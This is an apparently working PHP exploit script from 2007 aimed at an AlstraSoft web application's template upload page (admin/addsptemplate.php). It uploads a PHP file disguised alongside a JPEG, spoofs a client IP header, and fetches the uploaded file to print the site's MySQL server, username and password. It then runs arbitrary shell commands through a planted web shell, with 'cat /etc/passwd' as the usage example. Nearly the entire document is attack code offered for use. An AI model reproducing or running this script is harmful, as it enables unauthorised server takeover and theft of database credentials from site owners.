#!/usr/bin/php -q -d short_open_tag=on Thanks to rgod for the php code and Marty for the Love "; if ($argc<4) { echo "Usage: php ".$argv[0]." Host Path CMD Host: target server (ip/hostname) Path: path of template CMD: A Shell Command Example: php ".$argv[0]." localhost /template/ cat /etc/passwd"; die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); /* ___________________________________________________________________ / This script is part of the AlstraSoft Exploit Pack: \ | | | http://itablackhawk.altervista.org/exploit/alsoft_exploit_pack; | | | | You can find the patches for this bugs at: | | | | http://itablackhawk.altervista.org/download/alsoft_patch.zip | | | \________________________.:BlackHawk 2007:._________________________/ */ /* VULN EXPLANATION Same problem of Vuln N.1 but with this we can upload PHP files.. The Vulnerable script can be found in admin/addsptemplate.php */ function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $cmd=""; for ($i=3; $i<=$argc-1; $i++){ $cmd.=" ".$argv[$i]; } $port=80; $proxy=""; $cmd=urlencode($cmd); if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} echo "- Uploading Shell Creator..\r\n"; $italy_rulez= chr(0xff).chr(0xd8).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a). chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01). chr(0x00).chr(0x60).chr(0x00).chr(0x60).chr(0x00).chr(0x00).chr(0xff). chr(0xe1).chr(0x00).chr(0x36).chr(0x45).chr(0x78).chr(0x69).chr(0x66). chr(0x00).chr(0x00).chr(0x49).chr(0x49).chr(0x2a).chr(0x00).chr(0x08). chr(0x00).chr(0x00).chr(0x00).chr(0x02).chr(0x00).chr(0x01).chr(0x03). chr(0x05).chr(0x00).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x26). chr(0x00).chr(0x00).chr(0x00).chr(0x03).chr(0x03).chr(0x01).chr(0x00). chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x14).chr(0xc6). chr(0xff).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xa0).chr(0x86). chr(0x01).chr(0x00).chr(0x8f).chr(0xb1).chr(0x00).chr(0x00).chr(0xff). chr(0xdb).chr(0x00).chr(0x43).chr(0x00).chr(0x08).chr(0x06).chr(0x06). chr(0x07).chr(0x06).chr(0x05).chr(0x08).chr(0x07).chr(0x07).chr(0x07). chr(0x09).chr(0x09).chr(0x08).chr(0x0a).chr(0x0c).chr(0x14).chr(0x0d). chr(0x0c).chr(0x0b).chr(0x0b).chr(0x0c).chr(0x19).chr(0x12).chr(0x13). chr(0x0f).chr(0x14).chr(0x1d).chr(0x1a).chr(0x1f).chr(0x1e).chr(0x1d). chr(0x1a).chr(0x1c).chr(0x1c).chr(0x20).chr(0x24).chr(0x2e).chr(0x27). chr(0x20).chr(0x22).chr(0x2c).chr(0x23).chr(0x1c).chr(0x1c).chr(0x28). chr(0x37).chr(0x29).chr(0x2c).chr(0x30).chr(0x31).chr(0x34).chr(0x34). chr(0x34).chr(0x1f).chr(0x27).chr(0x39).chr(0x3d).chr(0x38).chr(0x32). chr(0x3c).chr(0x2e).chr(0x33).chr(0x34).chr(0x32).chr(0xff).chr(0xdb). chr(0x00).chr(0x43).chr(0x01).chr(0x09).chr(0x09).chr(0x09).chr(0x0c). chr(0x0b).chr(0x0c).chr(0x18).chr(0x0d).chr(0x0d).chr(0x18).chr(0x32). chr(0x21).chr(0x1c).chr(0x21).chr(0x32).chr(0x32).chr(0x32).chr(0x32). chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32). chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32). chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32). chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32). chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32). chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0x32). chr(0x32).chr(0x32).chr(0x32).chr(0x32).chr(0xff).chr(0xc0).chr(0x00). chr(0x11).chr(0x08).chr(0x00).chr(0x14).chr(0x00).chr(0x1e).chr(0x03). chr(0x01).chr(0x22).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03). chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x00). chr(0x00).chr(0x01).chr(0x05).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04). chr(0x05).chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b). chr(0xff).chr(0xc4).chr(0x00).chr(0xb5).chr(0x10).chr(0x00).chr(0x02). chr(0x01).chr(0x03).chr(0x03).chr(0x02).chr(0x04).chr(0x03).chr(0x05). chr(0x05).chr(0x04).chr(0x04).chr(0x00).chr(0x00).chr(0x01).chr(0x7d). chr(0x01).chr(0x02).chr(0x03).chr(0x00).chr(0x04).chr(0x11).chr(0x05). chr(0x12).chr(0x21).chr(0x31).chr(0x41).chr(0x06).chr(0x13).chr(0x51). chr(0x61).chr(0x07).chr(0x22).chr(0x71).chr(0x14).chr(0x32).chr(0x81). chr(0x91).chr(0xa1).chr(0x08).chr(0x23).chr(0x42).chr(0xb1).chr(0xc1). chr(0x15).chr(0x52).chr(0xd1).chr(0xf0).chr(0x24).chr(0x33).chr(0x62). chr(0x72).chr(0x82).chr(0x09).chr(0x0a).chr(0x16).chr(0x17).chr(0x18). chr(0x19).chr(0x1a).chr(0x25).chr(0x26).chr(0x27).chr(0x28).chr(0x29). chr(0x2a).chr(0x34).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39). chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48). chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57). chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66). chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75). chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x83).chr(0x84). chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a).chr(0x92). chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98).chr(0x99). chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6).chr(0xa7). chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4).chr(0xb5). chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2).chr(0xc3). chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9).chr(0xca). chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7).chr(0xd8). chr(0xd9).chr(0xda).chr(0xe1).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5). chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf1).chr(0xf2). chr(0xf3).chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9). chr(0xfa).chr(0xff).chr(0xc4).chr(0x00).chr(0x1f).chr(0x01).chr(0x00). chr(0x03).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00). chr(0x00).chr(0x00).chr(0x01).chr(0x02).chr(0x03).chr(0x04).chr(0x05). chr(0x06).chr(0x07).chr(0x08).chr(0x09).chr(0x0a).chr(0x0b).chr(0xff). chr(0xc4).chr(0x00).chr(0xb5).chr(0x11).chr(0x00).chr(0x02).chr(0x01). chr(0x02).chr(0x04).chr(0x04).chr(0x03).chr(0x04).chr(0x07).chr(0x05). chr(0x04).chr(0x04).chr(0x00).chr(0x01).chr(0x02).chr(0x77).chr(0x00). chr(0x01).chr(0x02).chr(0x03).chr(0x11).chr(0x04).chr(0x05).chr(0x21). chr(0x31).chr(0x06).chr(0x12).chr(0x41).chr(0x51).chr(0x07).chr(0x61). chr(0x71).chr(0x13).chr(0x22).chr(0x32).chr(0x81).chr(0x08).chr(0x14). chr(0x42).chr(0x91).chr(0xa1).chr(0xb1).chr(0xc1).chr(0x09).chr(0x23). chr(0x33).chr(0x52).chr(0xf0).chr(0x15).chr(0x62).chr(0x72).chr(0xd1). chr(0x0a).chr(0x16).chr(0x24).chr(0x34).chr(0xe1).chr(0x25).chr(0xf1). chr(0x17).chr(0x18).chr(0x19).chr(0x1a).chr(0x26).chr(0x27).chr(0x28). chr(0x29).chr(0x2a).chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39). chr(0x3a).chr(0x43).chr(0x44).chr(0x45).chr(0x46).chr(0x47).chr(0x48). chr(0x49).chr(0x4a).chr(0x53).chr(0x54).chr(0x55).chr(0x56).chr(0x57). chr(0x58).chr(0x59).chr(0x5a).chr(0x63).chr(0x64).chr(0x65).chr(0x66). chr(0x67).chr(0x68).chr(0x69).chr(0x6a).chr(0x73).chr(0x74).chr(0x75). chr(0x76).chr(0x77).chr(0x78).chr(0x79).chr(0x7a).chr(0x82).chr(0x83). chr(0x84).chr(0x85).chr(0x86).chr(0x87).chr(0x88).chr(0x89).chr(0x8a). chr(0x92).chr(0x93).chr(0x94).chr(0x95).chr(0x96).chr(0x97).chr(0x98). chr(0x99).chr(0x9a).chr(0xa2).chr(0xa3).chr(0xa4).chr(0xa5).chr(0xa6). chr(0xa7).chr(0xa8).chr(0xa9).chr(0xaa).chr(0xb2).chr(0xb3).chr(0xb4). chr(0xb5).chr(0xb6).chr(0xb7).chr(0xb8).chr(0xb9).chr(0xba).chr(0xc2). chr(0xc3).chr(0xc4).chr(0xc5).chr(0xc6).chr(0xc7).chr(0xc8).chr(0xc9). chr(0xca).chr(0xd2).chr(0xd3).chr(0xd4).chr(0xd5).chr(0xd6).chr(0xd7). chr(0xd8).chr(0xd9).chr(0xda).chr(0xe2).chr(0xe3).chr(0xe4).chr(0xe5). chr(0xe6).chr(0xe7).chr(0xe8).chr(0xe9).chr(0xea).chr(0xf2).chr(0xf3). chr(0xf4).chr(0xf5).chr(0xf6).chr(0xf7).chr(0xf8).chr(0xf9).chr(0xfa). chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).chr(0x01).chr(0x00). chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).chr(0x00). chr(0xd6).chr(0xaf).chr(0x4f).chr(0xf0).chr(0x97).chr(0xfc).chr(0x8b). chr(0x16).chr(0x7f).chr(0xf0).chr(0x3f).chr(0xfd).chr(0x0d).chr(0xab). chr(0xcc).chr(0x2b).chr(0xd3).chr(0xfc).chr(0x25).chr(0xff).chr(0x00). chr(0x22).chr(0xc5).chr(0x9f).chr(0xfc).chr(0x0f).chr(0xff).chr(0x00). chr(0x43).chr(0x6a).chr(0xf9).chr(0x0c).chr(0x83).chr(0xfd).chr(0xe6). chr(0x5f).chr(0xe1).chr(0x7f).chr(0x9a).chr(0x3e).chr(0x13).chr(0x85). chr(0xff).chr(0x00).chr(0xdf).chr(0x25).chr(0xfe).chr(0x17).chr(0xf9). chr(0xa3).chr(0x80).chr(0xf8).chr(0xd9).chr(0xff).chr(0x00).chr(0x30). chr(0x3f).chr(0xfb).chr(0x78).chr(0xff).chr(0x00).chr(0xda).chr(0x75). chr(0xe4).chr(0xb5).chr(0xeb).chr(0x5f).chr(0x1b).chr(0x3f).chr(0xe6). chr(0x07).chr(0xff).chr(0x00).chr(0x6f).chr(0x1f).chr(0xfb).chr(0x4e). chr(0xbc).chr(0x96).chr(0xbd).chr(0x2c).chr(0x67).chr(0xf1).chr(0xe5). chr(0xf2).chr(0xfc).chr(0x8f).chr(0xe9).chr(0x0e).chr(0x1b).chr(0xff). chr(0x00).chr(0x91).chr(0x5d).chr(0x2f).chr(0xfb).chr(0x7b).chr(0xff). chr(0x00).chr(0x4a).chr(0x67).chr(0xa5).chr(0x57).chr(0xa7).chr(0xf8). chr(0x4b).chr(0xfe).chr(0x45).chr(0x8b).chr(0x3f).chr(0xf8).chr(0x1f). chr(0xfe).chr(0x86).chr(0xd4).chr(0x51).chr(0x5e).chr(0x6e).chr(0x41). chr(0xfe).chr(0xf3).chr(0x2f).chr(0xf0).chr(0xbf).chr(0xcd).chr(0x1f). chr(0xcd).chr(0xfc).chr(0x2f).chr(0xfe).chr(0xf9).chr(0x2f).chr(0xf0). chr(0xbf).chr(0xcd).chr(0x1c).chr(0x07).chr(0xc6).chr(0xcf).chr(0xf9). chr(0x81).chr(0xff).chr(0x00).chr(0xdb).chr(0xc7).chr(0xfe).chr(0xd3). chr(0xaf).chr(0x25).chr(0xa2).chr(0x8a).chr(0xf4).chr(0xb1).chr(0x9f). chr(0xc7).chr(0x97).chr(0xcb).chr(0xf2).chr(0x3f).chr(0xa4).chr(0x38). chr(0x6f).chr(0xfe).chr(0x45).chr(0x74).chr(0xbf).chr(0xed).chr(0xef). chr(0xfd).chr(0x29).chr(0x9f).chr(0xff).chr(0xd9); $data="-----------------------------7d529a1d23092a\r\n"; $data.="Content-Disposition: form-data; name=\"zip\"; filename=\"piggy_marty_creator.php\"\r\n"; $data.="Content-Type:\r\n\r\n"; $data.="'); fclose(\$fp); chmod('piggy_marty.php',777); include '../../include/common.php'; echo 'delimitator'.\$db_server.'|'.\$db_user.'|'.\$db_password.'|'.\$db_database; ?>\r\n"; $data.='-----------------------------7d529a1d23092a Content-Disposition: form-data; name="addsubmit" 1 -----------------------------7d529a1d23092a Content-Disposition: form-data; name="type" 2 -----------------------------7d529a1d23092a Content-Disposition: form-data; name="category" Exploit And Similar -----------------------------7d529a1d23092a Content-Disposition: form-data; name="sdes" 4 -----------------------------7d529a1d23092a Content-Disposition: form-data; name="fpi"; filename="daforno_imperat.jpeg"; Content-Type: image/pjpeg '.$italy_rulez.' -----------------------------7d529a1d23092a-- '; $packet="POST ".$p."admin/addsptemplate.php HTTP/1.0\r\n"; $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."/example.html\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet); echo "- Retrieving correct Path where the shell is located..\r\n"; $packet ="GET ".$p."spusers/browse.php?browse=yes&show=all HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); if (preg_match("#/sptemplates/(.*?)/thumb_daforno_imperat.jpeg#is", $html, $oki)) { echo "- Creating the Shell & getting server credentials..\r\n"; $packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty_creator.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); sleep(3); $temp=explode('delimitator',$html); list($myserver,$myusername,$mypassword,$mydbname)=explode('|',$temp[1]); echo " --- INFO FROM COMMON.PHP --- MySQL Server: $myserver MySQL Username: $myusername MySQL Password: $mypassword MySQL Database: $mydbname --- END INFO --- "; echo "Step 5 - Execute Commands exist..\r\n"; $packet ="GET ".$p."sptemplates/".$oki[1]."/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); if (strstr($html,"666999")) { echo "Exploit succeeded...\r\n"; $temp=explode("666999",$html); die("\r\n".$temp[1]."\r\n"); } } else { die ('Error: Can\'t retrieve Shell Path'); } # Coded With BH Fast Generator v0.1 ?>